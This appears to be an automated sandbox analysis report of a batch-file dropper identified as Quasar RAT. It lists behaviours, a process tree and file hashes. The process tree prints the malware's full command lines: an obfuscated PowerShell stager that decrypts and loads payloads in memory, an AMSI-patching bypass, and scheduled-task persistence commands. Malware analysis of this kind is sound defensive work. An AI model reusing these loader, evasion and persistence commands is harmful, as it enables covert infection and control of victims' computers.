Analysis
-
max time kernel
150s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
22/08/2024, 01:03
General
-
Target
081da7f15e7bd101ab50628a23ffa3f8464db8c6f858f5d40faa890166554e39.bat
-
Size
3.4MB
-
MD5
e0b49da0d96e8c5214e9276be383177c
-
SHA1
acc2c37d489134c2186e95efaf7d3ea768a226f5
-
SHA256
081da7f15e7bd101ab50628a23ffa3f8464db8c6f858f5d40faa890166554e39
-
SHA512
b34944610642622ed45b1b09b4281e6d4b2f160c3b988aec2c254e2860cc1e5e40d6430057ea61fa323c8d99a32caeab50404c1d10baeb9a3b4bd12e6c068cee
-
SSDEEP
49152:iPZ9h8UbMrOvMl2axWm2aPRlAYydkm6uOwIM0A8Dqpb:C
Score
10/10
Malware Config
Extracted
Family
quasar
Attributes
-
encryption_key
853F98C0E8F31E6FF0C780CC65F601689B6EF3FD
-
reconnect_delay
3000
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 1 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Blocklisted process makes network request 3 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Using powershell.exe command.
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Deletes itself 1 IoCs
-
Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
-
Drops file in System32 directory 13 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 21 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Windows directory 5 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 55 IoCs
-
Modifies registry class 64 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of UnmapMainImage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{1e0f901d-78dd-4e1e-a4ff-1286f2f2e5b9}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\Windows\$nya-onimai3\$nya-Loli.vbs" "C:\Windows\$nya-onimai3\$nya-Loli.bat"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function krvoX($qfUzb){ $mgPVz=[System.Security.Cryptography.Aes]::Create(); $mgPVz.Mode=[System.Security.Cryptography.CipherMode]::CBC; $mgPVz.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $mgPVz.Key=[System.Convert]::FromBase64String('xRkMWAT1uldEXK+LHs8FgxSd3tjb0CDR/qmLOT+Eew4='); $mgPVz.IV=[System.Convert]::FromBase64String('RdAogkuv6cVOJVqYg0tlnA=='); $KTEGP=$mgPVz.CreateDecryptor(); $PBmwa=$KTEGP.TransformFinalBlock($qfUzb, 0, $qfUzb.Length); $KTEGP.Dispose(); $mgPVz.Dispose(); $PBmwa;}function XUcba($qfUzb){ IEX '$ZRxrm=New-Object System.IO.M*em*or*yS*tr*ea*m(,$qfUzb);'.Replace('*', ''); IEX '$kyGQg=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jJBpR=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($ZRxrm, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jJBpR.CopyTo($kyGQg); $jJBpR.Dispose(); $ZRxrm.Dispose(); $kyGQg.Dispose(); $kyGQg.ToArray();}function dJKqw($qfUzb,$zcLjt){ IEX '$apikB=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$qfUzb);'.Replace('*', ''); IEX '$ybXvp=$apikB.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$ybXvp.*I*n*v*o*k*e*($null, $zcLjt);'.Replace('*', '');}$kzvdP = 'C:\Windows\$nya-onimai3\$nya-Loli.bat';$host.UI.RawUI.WindowTitle = $kzvdP;$GYDJk=[System.IO.File]::ReadAllText($kzvdP).Split([Environment]::NewLine);foreach ($FUbJH in $GYDJk) { if ($FUbJH.StartsWith(':: ')) { $GufiU=$FUbJH.Substring(3); break; }}$zAGQw=[string[]]$GufiU.Split('\');IEX '$iNocK=XUcba (krvoX ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($zAGQw[0])));'.Replace('*', '');IEX '$VsMSG=XUcba (krvoX ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($zAGQw[1])));'.Replace('*', '');dJKqw $iNocK $null;dJKqw $VsMSG (,[string[]] ('')); "4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Delete /TN "$nya-Loli_1" /F5⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"5⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\system32\schtasks.exe"schtasks" /create /ru builtin\Users /sc onlogon /tn $nya-Loli_ /F /RL HIGHEST /tr "wscript.exe 'C:\Windows\$nya-onimai3\$nya-Loli.vbs' 'C:\Windows\$nya-onimai3\$nya-Loli.bat'"5⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:zQwqRLlluCRu{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wxJErOELuetXJL,[Parameter(Position=1)][Type]$ILMaiplZKO)$jycamFgYzNN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+'f'+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+'d'+''+'D'+''+[Char](101)+''+'l'+''+'e'+''+'g'+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+''+'e'+''+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+[Char](77)+'od'+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+[Char](97)+''+'t'+'eT'+[Char](121)+'p'+[Char](101)+'',''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+'i'+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+','+[Char](65)+''+'u'+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$jycamFgYzNN.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+'c'+'i'+'a'+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+[Char](83)+''+'i'+'g'+','+''+'P'+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$wxJErOELuetXJL).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+'e,Ma'+[Char](110)+''+[Char](97)+'ge'+'d'+'');$jycamFgYzNN.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+'k'+'e','P'+'u'+''+[Char](98)+''+[Char](108)+''+'i'+'c'+[Char](44)+'H'+[Char](105)+'deBy'+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+'w'+[Char](83)+''+'l'+''+'o'+''+[Char](116)+','+'V'+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$ILMaiplZKO,$wxJErOELuetXJL).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+'ge'+'d'+'');Write-Output $jycamFgYzNN.CreateType();}$flQQFBFVObWFk=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+'s'+[Char](116)+''+[Char](101)+'m'+[Char](46)+''+[Char](100)+'ll')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+'f'+'t'+''+'.'+''+[Char](87)+''+[Char](105)+'n3'+[Char](50)+''+'.'+''+[Char](85)+''+[Char](110)+''+'s'+''+'a'+''+'f'+''+[Char](101)+''+[Char](78)+'at'+[Char](105)+'v'+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+'s');$fKsHqxwucuFHbs=$flQQFBFVObWFk.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'P'+[Char](114)+''+[Char](111)+'c'+[Char](65)+'ddr'+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+'b'+'l'+''+'i'+'c'+[Char](44)+''+'S'+''+[Char](116)+''+'a'+''+[Char](116)+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JjRaDJVhPPzLdAsdEUX=zQwqRLlluCRu @([String])([IntPtr]);$mEtyAOVwyJNLOxNZDrGXkg=zQwqRLlluCRu @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gkvXiMBlVzL=$flQQFBFVObWFk.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+'l'+''+'e'+'H'+[Char](97)+'n'+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+''+[Char](110)+''+'e'+''+'l'+''+[Char](51)+'2.'+'d'+''+'l'+''+[Char](108)+'')));$bmqGEXVAudjNBB=$fKsHqxwucuFHbs.Invoke($Null,@([Object]$gkvXiMBlVzL,[Object]('Load'+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+'a'+[Char](114)+''+[Char](121)+''+'A'+'')));$jeWulZpvxUTqGjcmC=$fKsHqxwucuFHbs.Invoke($Null,@([Object]$gkvXiMBlVzL,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+'u'+'a'+''+[Char](108)+'P'+[Char](114)+''+[Char](111)+'tec'+[Char](116)+'')));$Qafnfrl=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bmqGEXVAudjNBB,$JjRaDJVhPPzLdAsdEUX).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+'.'+'d'+''+'l'+''+'l'+'');$EBWMbrqKdFELcPUUB=$fKsHqxwucuFHbs.Invoke($Null,@([Object]$Qafnfrl,[Object](''+[Char](65)+'m'+[Char](115)+''+'i'+''+'S'+''+[Char](99)+'a'+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+'f'+''+'e'+''+[Char](114)+'')));$qkuBlLtQJF=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jeWulZpvxUTqGjcmC,$mEtyAOVwyJNLOxNZDrGXkg).Invoke($EBWMbrqKdFELcPUUB,[uint32]8,4,[ref]$qkuBlLtQJF);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$EBWMbrqKdFELcPUUB,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jeWulZpvxUTqGjcmC,$mEtyAOVwyJNLOxNZDrGXkg).Invoke($EBWMbrqKdFELcPUUB,[uint32]8,0x20,[ref]$qkuBlLtQJF);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+'W'+''+'A'+''+[Char](82)+''+'E'+'').GetValue(''+'$'+''+[Char](110)+'ya-st'+[Char](97)+''+'g'+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of UnmapMainImage
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\081da7f15e7bd101ab50628a23ffa3f8464db8c6f858f5d40faa890166554e39.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function krvoX($qfUzb){ $mgPVz=[System.Security.Cryptography.Aes]::Create(); $mgPVz.Mode=[System.Security.Cryptography.CipherMode]::CBC; $mgPVz.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $mgPVz.Key=[System.Convert]::FromBase64String('xRkMWAT1uldEXK+LHs8FgxSd3tjb0CDR/qmLOT+Eew4='); $mgPVz.IV=[System.Convert]::FromBase64String('RdAogkuv6cVOJVqYg0tlnA=='); $KTEGP=$mgPVz.CreateDecryptor(); $PBmwa=$KTEGP.TransformFinalBlock($qfUzb, 0, $qfUzb.Length); $KTEGP.Dispose(); $mgPVz.Dispose(); $PBmwa;}function XUcba($qfUzb){ IEX '$ZRxrm=New-Object System.IO.M*em*or*yS*tr*ea*m(,$qfUzb);'.Replace('*', ''); IEX '$kyGQg=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jJBpR=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($ZRxrm, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jJBpR.CopyTo($kyGQg); $jJBpR.Dispose(); $ZRxrm.Dispose(); $kyGQg.Dispose(); $kyGQg.ToArray();}function dJKqw($qfUzb,$zcLjt){ IEX '$apikB=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$qfUzb);'.Replace('*', ''); IEX '$ybXvp=$apikB.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$ybXvp.*I*n*v*o*k*e*($null, $zcLjt);'.Replace('*', '');}$kzvdP = 'C:\Users\Admin\AppData\Local\Temp\081da7f15e7bd101ab50628a23ffa3f8464db8c6f858f5d40faa890166554e39.bat';$host.UI.RawUI.WindowTitle = $kzvdP;$GYDJk=[System.IO.File]::ReadAllText($kzvdP).Split([Environment]::NewLine);foreach ($FUbJH in $GYDJk) { if ($FUbJH.StartsWith(':: ')) { $GufiU=$FUbJH.Substring(3); break; }}$zAGQw=[string[]]$GufiU.Split('\');IEX '$iNocK=XUcba (krvoX ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($zAGQw[0])));'.Replace('*', '');IEX '$VsMSG=XUcba (krvoX ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($zAGQw[1])));'.Replace('*', '');dJKqw $iNocK $null;dJKqw $VsMSG (,[string[]] ('')); "3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Deletes itself
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /sc MONTHLY /tn $nya-Loli_1 /F /RL HIGHEST /tr "wscript.exe 'C:\Windows\$nya-onimai3\$nya-Loli.vbs' 'C:\Windows\$nya-onimai3\$nya-Loli.bat'"4⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-ScheduledTask -TaskName '$nya-Loli_1'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
- Drops file in Windows directory
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
328B
MD5e8ae9f40bd61dc58b708b0eafc931da8
SHA19f789f6c1550ae73436803fde4f387f164d9020e
SHA256c5be87be3c2a918b962a2c5649bd13efc2144e9f861176a470adac56907ed972
SHA5129af6f81035093b8bb93bf5e2ec1563805b07fdf2f9d76374992bbd3b72e63a81f0800701df33aa6b489f8ebd9f7d90733ef73ad49f0038d5841b2c97d0a5cb07
-
Filesize
3KB
MD550c591ec2a1e49297738ea9f28e3ad23
SHA1137e36b4c7c40900138a6bcf8cf5a3cce4d142af
SHA2567648d785bda8cef95176c70711418cf3f18e065f7710f2ef467884b4887d8447
SHA51233b5fa32501855c2617a822a4e1a2c9b71f2cf27e1b896cf6e5a28473cfd5e6d126840ca1aa1f59ef32b0d0a82a2a95c94a9cc8b845367b61e65ec70d456deec
-
Filesize
2KB
MD59c1cbabb1c7b01a73a57ba9dff3a2b88
SHA1db08a68d1be20ef794469e3eea20d84d60f94cc4
SHA25652a7cdf7f20ba305d5c0943dd8820d9785157c10da3542798678fd19232b6ea7
SHA5124b044f9095c7dcfc932931b903e0be703374f60e14eeb994937c476e53a4537b79a4dc949de49f6f104c233d6feca0fd0a92b0ec421e990383629c4cf3b976f4
-
Filesize
328B
MD5fca7af87574119e59b9f98b00753e488
SHA10bc6c719354e24a72a383e08a876a26daac642cc
SHA256040da90f51781b5fcb61660b0adb5c6b417563c19ecb8b5d0fc2682df6ccffa8
SHA5127f35d4fd2b4a0649c374fb1d546b9b412c924bb12375034b15acd62d36792aee2633f3a769569231871d5aa34eb581508a7fee00d229c1ecf38d78f96d54d06e
-
Filesize
290B
MD5823eb65e01ae06ec59319ebdb9df0654
SHA19449d3fd06806aeed01691a6b9e2c2fc3faa4432
SHA2560091390e6af6a963962c8decb6b3aa16bf9de09677ecf876bd172cd9d20c5a6f
